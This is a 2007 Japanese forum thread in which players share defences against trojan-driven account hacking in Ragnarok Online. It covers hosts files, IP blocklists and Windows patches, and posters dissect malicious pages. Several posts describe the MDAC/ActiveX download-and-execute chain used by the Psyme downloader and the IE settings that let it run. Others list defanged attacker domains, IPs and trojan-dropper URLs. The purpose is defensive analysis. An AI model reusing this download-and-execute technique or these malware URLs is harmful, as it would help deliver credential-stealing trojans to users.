Wikiは編集はじめてだったのですが向こうを先に直してこちらにも書き込み。
で、ソースチェッカーで調べたら
IP:222.77.185.101(Chinanet Fujian Province Network)

自分のサイトとかの安全性がどんな風に見えるかの流れで
そのままソースチェッカーをやっていたのが幸いしました。
でも自分も踏んでいないか心配なので今チェック中。

81 名前:80:07/04/29 19:16 ID:JjJgaoUg0
今フルスキャン中なのですが対策スレまとめの危険サイト・ドメインリスト、
先のURLが既に登録済みだった様です。

このhostsリスト自体はWiki修正前に導入してあったんですけども
サイト記述の
"誤って罠URLを踏んでしまってもアクセスできないようにします。"
という事、これは文字通り
"万が一URLをクリックしてもそのURLにアクセスできないからウイルスが読み込まれない実行されない"
と言う認識で正しいですか?

凄いお子様な質問ですみません。

82 名前:(^ー^*)ノ〜さん:07/04/29 19:37 ID:jIcUQfLN0
>81
ほぼアタリかな。
スクリプト中にIPアドレスを直接書かれていたら、hostsファイル無視されるので
アクセスしてしまう可能性がある。要注意だ

83 名前:(^ー^*)ノ〜さん:07/04/29 20:06 ID:fsTQAGyj0
>81
その認識で合ってる。
本来のhostsの使い方とはちと違うがね。

hostsはホスト名とIPアドレスを変換するファイルで設定しておけば
そのIPアドレスに対して通信するので、罠サイトには飛ばなくなる。

まとめサイトのリストは随時更新されてるから、こまめに更新する
必要がある。
それが面倒に感じるなら、あこすれてんぷら避難所で配布されてる
自動更新スクリプトを使った方が良い。

ただしその場合は説明読んで、自己責任で使う事。

ちなみに自分は自動更新スクリプトをスタートアップにショトカ入れて
使ってる。
あれは楽でいいが、使う場合は改竄されてないかをチェックしてから
使うこと。
改竄版使うと>82の言うように元も子もない。

84 名前:80:07/04/29 20:56 ID:JjJgaoUg0
>>82 >>83
ご返答ありがとうございます。
踏んだ先に直にスクリプトが入っているとやばいのですか…。
やはりしつこい位に前もってURLの確認は本当に必要ですね。
すこしでも怪しいと感じたらソースチェッカー。
>>80の罠URL、Wikiの方で一回確認ページでクッションがあるので
その点は多分大丈夫だろうと思うしか。

自分の場合は回線切って緊急ロックかけてからメモ帳で編集。
新種の情報を知る意味でもこまめに更新する様に心がけてます。

そして今スキャン終わったので書き込み。特に何も無かった様です。
後でもう一度別種でスキャンかけてみる事にします。
今回は編集する時に罠URLコピペするときにもしかしたら…
とか思ってしまってたので少し安心。
次はCTRL+Aでメモ帳にコピーしてからチェッカーに貼り付けようと思いました。

85 名前:(^ー^*)ノ〜さん:07/04/29 23:52 ID:PxmmcRvb0
>>80
正しく理解されているかちょっと怪しく感じたので、
hostsに関してもうちょっと詳しく解説しておくと、

hostsファイルというのはローカルのDNSだと思ってください。
DNS=ホスト名をIPアドレスに変換してくれるもの

例えば、ホスト名www.google.co.jpのIPアドレスは、66.249.89.104です。
そして、ホスト名www.yahoo.co.jpのIPアドレスは、203.216.243.218です。
(↑自体が罠かもしれないので、実験するときは自分で調べましょう)

以下に3つの例を出します。

@ 203.216.243.218  www.google.co.jp
A (罠サイトのIPアドレス)  www.google.co.jp
B 127.0.0.1  (罠サイトのホスト名)

もし、hostsに@の記述があれば、ブラウザにwww.google.co.jpと打ち込んだときにYAHOOのHPが表示されます。
これぐらいなら悪戯で済みますが、Aだったらどうでしょう。ググろうと思った瞬間に罠サイトに飛ばされます。
これがhostsの改ざんによる危険性です。そしてBの場合、あやまって罠サイトへのリンクを踏んでも
127.0.0.1に飛ばされるので、事なきを得るわけです。(127.0.0.1とは自分自身のコンピュータを指します)

>>82さんが言っていたのは、HTMLソースに<iframe src="66.249.89.104">(←これはグーグルなので安全)のように
直接IPアドレスが記述されてた場合、ホスト名→IPアドレスの変換が不要なので、hostsファイルは
役に立たないわけです。この場合、PG2が役に立ちます。

86 名前:(^ー^*)ノ〜さん:07/04/30 02:03 ID:PR/5PytI0
80氏ではないが、すごく分かりやすい説明ありがとうございます。
勉強になりました。

87 名前:(^ー^*)ノ〜さん:07/04/30 04:00 ID:Mx0+9KJ40
前スレ773(http://gemma.mmobbs.com/test/read.cgi/ragnarok/1173963316/773)で
VBS/Psymeについて書いた者ですが、壮絶に勘違いをしておりましたので、訂正致します。

Psyme(サイミー)自体、亜種の多いウイルスのため、定義がいまいち良く分かってませんが、
今現在中華がメインで使っているタイプということに限定した場合、
以下のActiveXコントロール5種@〜DをVBScript(またはJScript)により生成し、
任意のファイル(大抵の場合Maran系トロイ)をダウンロードし、実行するというものです。

@ RDS.Dataspace (A〜Dを生成します)
→A Microsoft.XMLHTTP (サーバーからファイルをダウンロードします)
→B Adodb.Stream (ダウンロードしたファイルをCのパスに保存します)
→C Scripting.FileSystemObject (%TEMP%パス名を取得します)
→D Shell.Application (Bが保存したファイルを実行します)
※@はクラスID名(BD96C556-65A3-11D0-983A-00C04FC29E36)でスクリプト内に埋め込まれています
 
@が親玉だと思ってください。A〜Dは@の子として生成されます。これがミソです。
実際に悪さをするのはA〜Dなのですが、A〜Dを直接生成しようとすると
前スレ773に紹介したようなレジストリの設定により、生成が失敗する可能性があります。
そこで@なのです。@の子としてならレジストリの設定など無視して生成できてしまいます。

このセキュリティホールを塞ぐ修正パッチは約1年前にMicrosoftから出ています。それが、
「Microsoft Data Access Components (MDAC) の機能の脆弱性…(MS06-014)」になります。
http://www.microsoft.com/japan/technet/security/Bulletin/MS06-014.mspx
(一部例外もありますがWindows Updateをしておけば、この修正パッチは勝手に当たります)

このパッチを当てておけばA〜Dの生成はみごとに全部失敗してくれます。
(@は相変わらず生成できますが、@だけでは何もできません)

前スレ773に紹介した方法では、中華VBS/Psymeは防げませんが、MS06-014のパッチを当てておけば防げます。
結論として「Windows Updateをしておけば問題なし」という点では変わりありませんのでご安心を。

PS.前スレ773のレジストリキーがまったく無意味ということはなく、あれで防げるタイプの攻撃もあります。

88 名前:(^ー^*)ノ〜さん:07/04/30 09:42 ID:QXEo0WCW0
>>27さんと同症状でIE起動で笑点のテーマが一瞬流れましたよ、昨日。
情報が少ないので色々調べるのが大変でしたが結局yahooトップページの
サントリーと笑点のコラボFLASHが原因だったようです。
>>27さんもトップページをyahooに設定していたのではないでしょうか。
yahooのTOPで音が流れる事自体異例で不具合だったのではと思います。
yahooからのアナウンスが無いのが少しだけ疑問ですが…
まあ、お陰でスパイウェアとか色々見つけ、また気苦労がw
検知ソフトも、たまには新しいの入れてみるもんですね。

89 名前:(^ー^*)ノ〜さん:07/04/30 10:09 ID:J6zWwwyo0
>>66
それ思い当たる節があるが結局ただのデマで流れたネタじゃないか。
しかも垢ハク露天で確認されたのは天使鎧だけ。
同じ鯖のプレイヤとして一応突っ込んどくぜ。

90 名前:(^ー^*)ノ〜さん:07/04/30 10:21 ID:/iuguEvb0
【  アドレス   】 http://www■ragnarokonline■com/jp/r_main.htm
【気付いた日時】4/30
【     OS    】 XPまでしか・・
【使用ブラウザ 】 IE
【WindowsUpdateの有無】 おそらく3月の末
【 アンチウイルスソフト 】 Avast
【その他のSecurty対策 】 なし
【 ウイルススキャン結果】 カスペルスキーとウイルスバスターでスキャンしたけ感染はなし
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】踏んでから導入しました
【説明】
最初このアドレスを踏んだとき韓国文字と中国文字の画面が出てきてやばい!
って思ったのですが、知り合いに聞いてみると悪意性をもったものかどうかは判断
できないと言われましたがウイルスを仕掛けられている可能性は低いようなことは言われました。
一応スキャンして感染はなかったのでそれを信用して念のためPG2を入れて様子見しようと思ってますが
このスレ見てるみなさんでこのアドレスは悪意のあるものかどうか判断できるのならば教えてくれると幸いです。

91 名前:(^ー^*)ノ〜さん:07/04/30 10:27 ID:rw1kjgW80
>>90

>>1より再掲
アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例に関して扱います。
重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません


垢ハックと断定できない相談は、下記のスレへどうぞ

セキュリティ対策、質問・雑談スレ2
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

92 名前:(^ー^*)ノ〜さん:07/04/30 10:46 ID:cR2fjM7p0
公式HPだと気づかないほど慌ててるのに
テンプレの様式は守っててちょっと笑った。

93 名前:(^ー^*)ノ〜さん:07/04/30 10:54 ID:/iuguEvb0
>>90さん
指摘ありがとうございます。
以後気をつけます。

>>92
一応疑ってはいましたがやはり公式HPでしたか・・・
とりあえず危険ではないということがわかって安心しました。

94 名前:(^ー^*)ノ〜さん:07/04/30 14:50 ID:sMMEiRF40
>56
お前さんはまず現実に目をむけて生活固めてからネットやったほうがいいとおもうぞw

95 名前: ◆sp4Sh9QXGI:07/04/30 17:00 ID:EstyBqU90
jprmthomeのIPって222.77.185.83-222.77.185.110のどれかだったような気がするんですが
今見たら125.65.112.15に変わってます。
hostsを導入していない方はご注意を…。

96 名前: ◆sp4Sh9QXGI:07/04/30 17:07 ID:EstyBqU90
とりあえずPG2のリスト(通常・積極双方とも)に
125.64.0.0-125.71.255.255
を追加しておきました。様子見で制限帯域を縮小したりしようかと。

97 名前:87の補足です:07/04/30 17:41 ID:Mx0+9KJ40
以下に示すIEの設定が共に「有効にする」になっている場合は、MS06-014のパッチを当てていても、
>>87の@〜Dはすべて成功し、結果トロイが落ちてきて実行されますのでご注意を。
(両方とも「無効にする」を推奨します)

IEのメニューで、[ツール]-[インターネットオプション]-[セキュリティ]-[レベルのカスタマイズ]
・スクリプトを実行しても安全だとマークされていないActiveXコントロールの初期化とスクリプトの実行
・ドメイン間でのデータソースのアクセス

実際には、上記の設定を「有効」にしている人など、ほとんどいないとは思いますが、念のため。

98 名前:(^ー^*)ノ〜さん:07/04/30 18:01 ID:zEe2j8A20
>95
BSWikiさんの所の安全のために、に記載されてるIPは222.77.185.88ですが
同Junkにあるnslookupのリストやリネ資料室さんのPG2のリストでは
125.65.112.15になってますね。

いつ変わったんだろう?

99 名前:80:07/04/30 19:29 ID:uZ3T1muV0
>>81 hostsリストの質問
>>82 >>83 hostsリストについて
>>85 hostsの判りやすい動作一例
>>95 PG2とhostsの簡単な実例

後の人の為にも流れを纏めてみました。
82、83、85の様方、本当にありがとうございます。

簡単なスクリプトを記述しないといけないと言う程度の認識でした。
自分は危機感がまだまだ甘かったです。
おかげでIP直書きの恐ろしさが理解できました。
ホスト名で制限するhosts、IPを直に制限するPG2、
どちらにも利点欠点があるのですね。勉強になります。

対策スレまとめの方にも上の説明記述があると初心者さんは安心かもしれないですね。
それにしても両方あれば好ましいという状況がなんともですね。

100 名前:Logue ◆grDYeooZwg:07/04/30 19:55 ID:TkjTlvlf0
EventWikiに来た罠サイトらしき荒らしあり。以下はそのリスト。
昨日の0時頃までに復旧済み。

知らないうちに改編されていたものもあるので、
Wiki運営者は、単語検索でアドレスを確認するといいかと。
http://pukiwiki.sourceforge.jp/dev/?BugTrack2%2F208

蛇足ながら、フォーラム側にも同一ホストからの同じような投稿がありました。
人力によるもの(※)と考えられます。
※Captcha(画像認証)が破られていただけでなく、ユーザー登録して投稿してあった。

ezbbsy■com
23styles■com
livedoor-game■com
yy14-kakiko■com
m-phage■com

101 名前:(^ー^*)ノ〜さん:07/04/30 22:08 ID:EstyBqU90
>>98さま
editco-jp■comを追加した28日時点では222.77.185.110だったのですが
ただいま確認したところ125.65.112.95となっていました。
ということで、ここ3日の間にサーバが移転したことになるのでしょうか?
aguseによれば前者のサーバ位置は北京でしたが、現在は成都になっています。

102 名前: ◆sp4Sh9QXGI:07/04/30 22:09 ID:EstyBqU90
うっかりトリップ忘れ(´・ω・`)

103 名前:(^ー^*)ノ〜さん:07/05/01 00:13 ID:MSUGZT3V0
ログを確認すると、此方の環境では29日時点では222.77.185.88、30日で
125.65.112.15に変わっています。DNSキャッシュの関係もあり正確
ではないでしょうがその辺でしょうな。

104 名前:(^ー^*)ノ〜さん:07/05/01 07:22 ID:TXbEriDD0
23日 某鯖でハッキングされた方の補填が確認された模様。
1月前半にハッキングに会い警察に駆け込む。(生活安全課)
癌呆に連絡して本人とは違うIDからのアクセスを確認との報告。
警察に言って来いとの事で、本人が暇見つけて警察に。

警察から連絡が来て、その事を癌呆に連絡。
3週間後に癌呆から連絡&補填。

補填内容
被害者が癌呆に渡した装備等が写ってる垢ハック露店のSS分のみで
zeny等の補填は無かった模様(?)

補填受けた人の言葉
SSは撮っておく。
さらに具体的にZENYやアイテムも報告するようにする。
補償は一回きりだそうなので、再発防止対策。

ハッキング当日通報から補填までの時間
約4ヶ月

もうどっかに報告上がってたらゴメンよ。

105 名前:(^ー^*)ノ〜さん:07/05/01 09:15 ID:Vnwcu7df0
いつもの福建人、ココログのリダイレクトを使って誘引する手口を確認。

掲示板などにリダイレクトアドレスを書き込む。
gameurdrにとばされる。
app■cocolog-nifty■com/t/comments?__mode=red&id=12886212

106 名前:(^ー^*)ノ〜さん:07/05/01 10:00 ID:JC0qcgIw0
>>62-64
つい最近それを踏んでしまったんだけど確認方法を教えて貰えませんか?
>>64で垢ハックアドレス、と言い切ってるけど具体的に何かプロセスが動いたりするのでしょうか?
今のところハッキングされた形跡がないのですが、本当に垢ハックサイトなんですか?

107 名前:(^ー^*)ノ〜さん:07/05/01 10:12 ID:Vnwcu7df0
>>106
>本当に垢ハックサイトなんですか?
垢ハックサイトと言うかドメインね。
言うまでもなく危険。

このドメインの登録情報、毎度おなじみ福建人のドメイン。
Domain Name ..................... blog-livedoor■net
Registrant Name ................. lin zhiqiang
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN

108 名前:(^ー^*)ノ〜さん:07/05/01 10:18 ID:xHcnRjRF0
>>100
ドメイン自体は既出ばかりだけど、人力投稿って方には今後の対応に
注目したいところですなぁ。

109 名前:(^ー^*)ノ〜さん:07/05/01 10:23 ID:JC0qcgIw0
ありがとうございます
でもavastもあちこちのオンラインスキャンしてもウィルスが出てこないし、
更に週2回くらい1DAYでちょくちょく遊ぶんだけど一向にハッキングされないんですよ
NEGiESで通信監視しても怪しい通信しないし(むしろプロセス名が出ないRagexe.exeのほうが不審)
タスクマネージャーみても変なexeが稼動してる様子もないし、
そもそも踏んだのがROじゃなくAngelLoveOnline本スレとかROと関係ないとこだったのでROと関係なさそうだな、と・・・

真っ白サイトだったけどウィルスインストールされる前に閉じちゃったのかな、中国サイト重いし・・・

110 名前:(^ー^*)ノ〜さん:07/05/01 11:42 ID:XBUIIOr40
>>109
>>67を読みなさい。
見ただけで「どんなPCでも絶対に感染するサイト」を作るなど不可能なのですよ。
単にあなたのPCが感染条件を満たさなかっただけかもしれない。
敵は数打ちゃ当たる戦法を取ってきてるようなものなので、
100人踏んで10人も感染すれば儲けものと考えているだろう。
そして自分がいつその10人になるかも分からないから、
十分に対策しておけと言うわけですよ。

111 名前:(^ー^*)ノ〜さん:07/05/01 11:49 ID:leq8ITBs0
>109
まとめサイトなりリネージュ資料室なり見て来れば、 blog-livedoorが
危険ホスト名に載ってるのが判ると思う。
LiveDoorの名前に似せたドメインを取ることで信用させる手段。
このスレでは「なんちゃってプロバイダ」と呼ばれてるが似たようなのに
niftyやbiglobeに似せたものもある。

危険ドメインかどうかの確認方法は上述のサイトに載ってるか、とか
Whois情報確認(>107)とか、ソースチェッカーオンライン使うとか。
既知の危険ドメインに関しては、何通りか調べる手段はある。

踏んだ時点で感染するかどうかは各自の対策によって変わる。
WindowsUpdateや使用したブラウザ、ブラウザの設定、hostsの
変更有無やPG2の導入の有無など。

>そもそも踏んだのがROじゃなくAngelLoveOnline本スレとかROと関係ないとこだったので
それが最近の中華の手口。
DDO(Dungeons & Dragons Online)やWiiのWikiにも貼られてるという
報告もあった。
ROに関係ないサイトだから無害、と言えたのは昔の話。

112 名前:(^ー^*)ノ〜さん:07/05/01 13:20 ID:vytBPrJD0
>>109
ひぐらしが鳴く頃にwikiの本スレURLをexeファイル仕込んだサイトのURLに改ざんして行ったり、
スカッとゴルフパンヤ公式サイトのふれあいBBSに既存のスレタイトルを騙って、
こっちに引っ越しましたと言ってexeファイル仕込んだサイトのURLを貼って行ってたり
(空白ページでしたよ?URL間違ってないですか?とか書き込みがあり、何人も踏んでいるのがわかる;;)
また、ゲームとは全く繋がり無いYouTubeなどからおもしろい動画などを拾ってきては紹介しているサイトに貼っていったりもしている。
(相方プリさんと結婚します。式にはお世話になった方を呼びますので(省略)最後にURL誘導って書き込みがいきなりあって
浮きまくってたが、なんだこりゃ?って不思議に思った人が何人か踏んでた;;)
↑でも言われてるが手当たりしだいに貼っていってるのでROと関係ないサイト・スレだからとか全く関係なし。
貼られてるURLは先にチェックをするっていうのが身の安全を守れる手段となってる今のご時世。

113 名前:109:07/05/01 13:23 ID:JC0qcgIw0
判りやすい説明ありがとうございました
どうせ殆ど遊ばないしあとでレアアイテムは別垢に移しつつLinuxからPass変えて封印しときます
PCリカバリーはGW終わってから・・・

114 名前:(^ー^*)ノ〜さん:07/05/01 13:35 ID:C+7Nqkh70
垢ハックひどくなってない?

115 名前:(^ー^*)ノ〜さん:07/05/01 13:53 ID:kAI0au5V0
ひどいよ。
注意喚起すらしない運営はもっとひどいよ。

116 名前:(^ー^*)ノ〜さん:07/05/01 14:02 ID:i6tnxuIX0
>>111
ちょっと前の記事だけど、「なんちゃってプロバイダ」について
so-netのセキュリティ関連ニュースでも取り上げられてました。
http://www.so-net.ne.jp/security/news/library/923.html

URLの確認は本当に細心の注意が必要ですね。
1文字違いとかだから、パッと見ただけじゃ全然分からないし。
(本物)homepage3.nifty.com
(中華)homepage3-nifty■com

117 名前:(^ー^*)ノ〜さん:07/05/01 14:22 ID:XEX/Mh0G0
ヘルプデスクで注意喚起すんのかって質問したんだけどご意見ありがとうございますで終わってた。
違うよ俺が聞きたいのは対策する気あるのかどうかだよ。

118 名前:(^ー^*)ノ〜さん:07/05/01 14:29 ID:h9K+D7750
恒例のテンプレ回答だな・・・。
俺もそうだった。

119 名前:(^ー^*)ノ〜さん:07/05/01 15:20 ID:kAI0au5V0
垢ハックさせてからプレイヤーにアイテムの補償をすれば、社内規定(あるのか不明だが)に
触れることなく高額アイテムを生成できるしな。
間接的に生成したアイテムを中華に貢いでるのと変わらん。

120 名前:(^ー^*)ノ〜さん:07/05/01 16:14 ID:D6RE/DIwO
いや注意や警告はもちろんだが保障の問題だろ…
実際に被害食らって報告しても俺らは知らないから警察いけよっていうテンプレ回答

実際警察行くと馬鹿みたいに手間と時間かかる
癌にアカハック報告してもまったく意味ないのがなんともね
対策もしなけりゃ救済もしない
キャラパスなんて一週間持たずに看破されたし、不正者の技術>>>>癌じゃ無理あるわ
警察が丸腰で犯罪者がみんな武装してるようなもん

癌のヘルプデスクに不正を助長するサイトですと
アカハックURLをダイレクトに送りまくってやろうかね
まぁバイトが使うテンプレ返信PCじゃ癌はRO起動してないだろうが…

121 名前:(^ー^*)ノ〜さん:07/05/01 17:10 ID:VmWlwHHG0
>>116
他社だからか、痛烈な批判だな。
サブドメインで済むサービスまで、用途別の独自ドメインを濫用取得している事への。

122 名前:(^ー^*)ノ〜さん:07/05/01 17:21 ID:9+vqYbww0
お金払えばどんな名前でも貰える状況も、なんだかな

123 名前:(^ー^*)ノ〜さん:07/05/01 17:24 ID:leq8ITBs0
しかし他人事のような書き方だな。
中華の事だから、そのうちblog-sonetとかのドメインが出現しても何ら不思議じゃないのに。

そういうなんちゃってSonetなドメインが出てきた日にはどうする気なんだか。
厳重抗議した所で、そのドメインを閉鎖に持ち込めるかどうか。
もしなんだかんだ、のらりくらりと逃げられて閉鎖に持ち込めなかった日には、ねぇ……

で、Sonetのその記事にしても、注意しろ、というだけ。
結局ユーザーサイドとしては、hosts変更やPG2で自衛するしかないのは今までと変わりなし。

124 名前:(^ー^*)ノ〜さん:07/05/02 00:44 ID:LoZYoAQH0
なんちゃってドメインは阻止しようがないかもね。
goo.ne.jpのなんちゃってエロサイトのgoo.co.jpが訴えられて閉鎖になったけど
ttp://www.watch.impress.co.jp/internet/www/article/2002/1017/goo.htm
これはドメインが同一で尚且つ両社とも国内の話だからなぁ。
whitehouseと名のつくURIがいくつもある(正解は政府関係なので.gov)
ことも考えると、server.domainと錯誤させるようなserver-dimain程度では
微妙じゃないかな。URIには気をつけよう、としか。

125 名前:(^ー^*)ノ〜さん:07/05/02 03:45 ID:1YE9v1Eo0
癌の対応ワロスww
これギャクじゃなく企業がしてる回答なんだよな
信じられんわ。。。そりゃ株価最安値更新するよ
これから先SB系列関係は絶対に加入やら購入しないわ

126 名前:(^ー^*)ノ〜さん:07/05/02 06:32 ID:VEE7cvDG0
ガンホーテンプレ話とか持ち出すと内容が
雑談板っぽくなってるのでそういう話は該当スレでどうぞ。


以下 アカウントハック総合対策スレ7 をどうぞー

>>126自治厨乙!

127 名前:(^ー^*)ノ〜さん:07/05/02 08:15 ID:UejZUQ4t0
垢ハックによるRMCへの書き込みが酷い。

128 名前:(^ー^*)ノ〜さん:07/05/02 08:33 ID:g1T3iJpY0
言いたいことは分かるが、それを言うなら「RMCへの垢ハックの書き込みが酷い」だろ。
垢ハックされるとRMCへ自動で書き込みされそうな物言いが気になったので一応。

129 名前:(^ー^*)ノ〜さん:07/05/02 10:37 ID:7LSeeyYS0
RMCの記事に直にexeファイルのリンクが書いてあったね。
さすがにこれは…と思ったけどw

130 名前:(^ー^*)ノ〜さん:07/05/02 14:04 ID:UFEDSyjf0
そのExeうっかり踏んじまった…
NOD32だとウィルス検出はされなかったんだが大丈夫かね

131 名前:(^ー^*)ノ〜さん:07/05/02 14:08 ID:SSdfQ2oP0
何を言ってるのか誰か翻訳頼む

132 名前:(^ー^*)ノ〜さん:07/05/02 14:23 ID:xadkgGNm0
RMCのその記事はみてないが、exe直貼りでそれをクリックしたって事は
基本的にDL/実行の窓が出るんじゃ?
罠サイトに飛ばされて仕込まれるなら兎も角、exeのurlが貼られてる分には
そうそう被害出ないと思うんだが。

133 名前:(^ー^*)ノ〜さん:07/05/02 14:42 ID:Z7eIhRVs0
それ以前にRMCの掲示板にURL貼り付けてもリンクには変換されないと思うんだけど、
カキコするときに、aタグ使えばリンクになるのかな?
それともブラウザによってはURLを勝手にリンクに変換するとか??

134 名前:(^ー^*)ノ〜さん:07/05/02 15:42 ID:Vy1AOVvY0
2chをち板の鯖スレの書き込み

15 名前:おすすめ2ちゃんねる 投稿日:2007/05/01(火) 19:00:18 ID:BNQQQxJh
無題

このステに対する意見募集します。
装備のアドバイスなどあるとうれしいです。

詳しくは:http://www■gamesragnaroklink■net/news/



iframeによる www■acyberhome■com/news/Ms06014■htm の呼び出しと
カーソルの www■acyberhome■com/news/test■cur

あと、Microsoft.XMLHTTP で何かオブジェクトを生成してたけど私はよくわからないので。

gamesragnaroklink■net [125.65.112.14]
acyberhome■com [125.65.112.14]
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan

散々既出のドメインですが

135 名前:(^ー^*)ノ〜さん:07/05/02 17:18 ID:Z7eIhRVs0
>>134
ダウンローダの方は
www■acyberhome■com/news/Ms06014■htm が名前の通りMS06-014脆弱性利用(0x7Fと&取らないと読めない)
www■acyberhome■com/news/test■cur はMS07-017脆弱性利用

どっち経由でも落ちてくるトロイ本体は同じ
www■acyberhome■com/news/svch■exe
(カスペ様でのウイルス名はTrojan-PSW.Win32.Maran.ei、他のソフトでも検出率良好)

136 名前:(^ー^*)ノ〜さん:07/05/02 17:45 ID:xadkgGNm0
>98/Meは使うな、どうしても使うならネットワークにつなぐな
ttp://www.itmedia.co.jp/news/articles/0705/02/news039.html

サポート終了してるOSを使うのは辞めた方がいい、という話。
つい最近似たような話題をしたと思ったら>27からの話だった。

137 名前:(^ー^*)ノ〜さん:07/05/03 09:11 ID:RSvFqes10
とあるRO系板の書き込み

www■soultakerbbs■net/897656/
と言う書き込みを見つけたのでソースチェックをしてみた。


exe
www■ahatena■com/897656/svch■exe

jpg
www■ahatena■com/897656\/muxiao1■jpg
www■ahatena■com/897656\/muxiao2■jpg

138 名前:(^ー^*)ノ〜さん:07/05/03 09:44 ID:DWvwy2P60
料理の成功率
--------------------------------------------------------------------------------
1に関しては、Dex50程度の騎士とDex140程度のハンターで僅かながら差があったので正しいかと思われます。
2と3に関しては、「ソバ打ち1000本」とかが有名ですね。
成功数600を越えた辺りから成功率が上がったような気がすると聞きます。
どちらかと言うと、2で成功数を稼ぐが有力かと。

あと、調理器具によっても違いますね。
レア度の高い物ほど成功率寄与度が高くなります。
野外<家庭<高級<宮廷<幻
の順で高くなったと記憶しています。

JobLvも関係すると耳にしましたが真偽の程は確認できていません。
(料理をしたのがJob50キャラのみのため)

参考にどうぞ
www■jpxpie6-7net■com/web/read_cgi/

某価格調査隊BBSへの投稿。

139 名前:(^ー^*)ノ〜さん:07/05/03 09:57 ID:i5t+JpkI0
>>137
自分のとこにも同じのあったから便乗。

wz.htm−何も無し?
wu.htm−iframeで↓の2つを開かせる。

1.htm
VBScriptでsvch.exeを拾わせようとする。
んで、変な暗号で次も実行させてる。
Microsoft.XMLHTTPで何かオブジェクトを生成してデータ抜こうとしてる?
ADODB.StreamでHDDアクセス命令?
2.htm
さらにiframeでwww■ahatena■com/897656/muxiao■jsを開き、
muxiao1.jpgとmuxiao2.jpgを表示。

こんな流れみたい。
ADODB.StreamとMicrosoft.XMLHTTPって勉強不足で
実のところよく分かってない;;

140 名前:(^ー^*)ノ〜さん:07/05/03 10:16 ID:DWvwy2P60
>>138
www■jpxpie6-7net■com/web/read_cgi/
javaスクリプト

http://www■jpxpie6-7net■com/web/read_cgi/Ms06014■htm と
http://www■jpxpie6-7net■com/web/read_cgi/test■cur を読み込ませようとする。

Ms06014.htm は、タイトルが
<title>super IE 0Day</title>
というページ。

文字化けしていて内容不明だが、セキュリティの穴を攻撃するものと思われる。

curは、いつものように Win32/TrojanDownloader.Ani.Gen トロイ の亜種
新しい亜種らしく、NOD32が自動提出。

141 名前:(^ー^*)ノ〜さん:07/05/03 10:25 ID:DWvwy2P60
140に追記
カスペオンラインスキャンでは、Exploit.Win32.IMG-ANI.ac として検知するので、カスペもブロック可能な筈。

142 名前:(^ー^*)ノ〜さん:07/05/03 12:45 ID:yq4/SndV0
>>140
Exploits of MDAC(MS06-014)攻撃用スクリプトということか。
だが、今更0Dayを称しているのも少々間が抜けている。
ttp://www.microsoft.com/japan/technet/security/Bulletin/MS06-014.mspx

143 名前:(^ー^*)ノ〜さん:07/05/03 12:47 ID:i5t+JpkI0
www■soultakerbbs■net/897656/

>>137,139だったが、仕込んであるものが>>140のものに変わってた。

144 名前:(^ー^*)ノ〜さん:07/05/03 12:50 ID:TN+tK3uy0
>139
>87にあるようにMDACの脆弱性を突くトラップ。
簡単に言えばsvch.exeをレジストリに登録して起動するように仕込んでる。
その手法としてADODB.Streamが使われてる。

WindowsUpdateをしてたら防げるけど、当ててない人も意外と多いので
この手の手法が今でも通じる。


余談だが、FWのログ見てると未だにCordRedの攻撃が日に2桁ほど来てる。
WindowsUpdateとかのパッチ当たってないマシンが数多い事の証拠でもあるが
全世界に未パッチ状態のマシンが何台あるんだ、ホントに……

145 名前:(^ー^*)ノ〜さん:07/05/03 12:51 ID:mAaYgELZ0
>>137
ソースチェッカーオンラインで調べたのかな?
さっき見たら4/8のキャッシュになってたから、削除して調べなおし。
(キャッシュが古い場合は削除お勧め。左下の方に削除と書かれたリンクがあります)
ファイルは差し替わってました。

@ www■soultakerbbs■net/897656/

ドキュメントの一部はJavaScriptにより作成される。
不可視iframeおよびdivタグ内のスタイル設定により下記2つをダウンロード
A www■soultakerbbs■net/897656/Ms06014■htm
B www■soultakerbbs■net/897656/test■cur

上記ABはいずれもダウンローダ。
Aはcharset=US-ASCII。最上位ビットを取り除かないと読めない。
中身はいつものVBScript&ActiveX(MS06-014脆弱性(MDAC)利用)
Bはアニメーションカーソル(MS07-017脆弱性(ANI)利用)

ダウンロードするファイルはいずれも同じ
C www■soultakerbbs■net/897656/svch■exe
(カスペルスキー検出名Trojan-PSW.Win32.Maran.ei)

中華は今のところ、馬鹿のひとつ覚えのように、MS06-014とMS07-017の脆弱性を突いてきてる。
犯人が実は一人しかいないのか・・・模倣犯が真似してるだけなのか・・・

146 名前:(^ー^*)ノ〜さん:07/05/03 13:15 ID:TN+tK3uy0
MS06-014やMS07-017の脆弱性は基本的にWindowsUpdateをしてたら
防げるものではあるが、Win9x系に向けたパッチは提供されてない。
だから既知の脆弱性を突くタイプのが出回ってるんだと思う。

そういえば知り合いにこの手の脆弱性の話をしてたら
「パッチ対象はWin2k/XP/2003SVか。ならWin98使ってるうちは安全だな」
と、真顔で答えられたっけ……

サポート終了してるからパッチが提供されてないだけ、ってのを、パッチが
提供されない=安全、と勘違いしてる人も多いようで……

147 名前:(^ー^*)ノ〜さん:07/05/04 01:51 ID:ow2KP6cD0
パッチの配布がないからこそ危ないって考えはないんかね・・・。
俺の知り合いにもそんなことを言う奴がいた。

148 名前:(^ー^*)ノ〜さん:07/05/04 02:09 ID:AbH3eyZC0
パッチが無い=(とりあえず)安全というのは間違いではないだろ

前提条件の『サポート終了してるからパッチが提供されない』を知っていればだが

149 名前:(^ー^*)ノ〜さん:07/05/04 04:16 ID:fh+thd8H0
それ以前に、ゲーム目的が少しでも絡むと、9x系でやってられない訳だが。
1GB以上のメモリを認識できない、64kBリソースの壁もある。
ファイルサイズ上限が4GB=DVDイメージすら扱う事が出来ない。
OSカーネルの根幹に16bitサンクレイヤが混在→システムが落ちやすい。
Unicodeにまともに対応してない→web文書の編集でも支障が出る。

セットトップボックスの延長線上くらいの使い方しかしていないから、9x系で不自由しない、と言うだけだろうな。

150 名前:(^ー^*)ノ〜さん:07/05/04 10:51 ID:B8SUI/hs0
